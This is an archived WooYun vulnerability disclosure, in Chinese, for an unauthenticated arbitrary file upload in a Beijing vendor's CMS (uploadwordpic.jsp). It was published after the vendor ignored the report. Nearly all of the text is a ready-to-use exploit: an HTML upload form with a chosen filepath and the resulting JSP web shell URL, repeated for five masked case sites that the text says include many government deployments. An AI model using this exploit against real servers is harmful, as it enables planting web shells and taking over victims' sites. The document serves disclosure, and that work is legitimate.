乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
北京东方文辉信息技术有限公司官网地址:http://**.**.**.**版本:通杀无需登录等认证大量政府案例:uploadwordpic.jsp文件上传:exp:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell:http://**.**.**.**/app/jspx.jspx/app路径可自定义
案例1:<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell:http://**.**.**.**/app/jspx.jspx
案例2:<FORM name=form1 method=post action="http://**.**.**.**:8088/nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell:http://**.**.**.**:8088/nlw/app/jspx.jspx
案例3:<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell: http://**.**.**.**/app/jspx.jspx
案例4:<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell:http://**.**.**.**/app/jspx.jspx
案例5:<FORM name=form1 method=post action="http://**.**.**.**/fsm/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>up:<input type="file" name="Filedata" size="30"><INPUT type=submit value=上传 name=Submit>shell:http://**.**.**.**/fsm/app/jspx.jspx
如上
未能联系到厂商或者厂商积极拒绝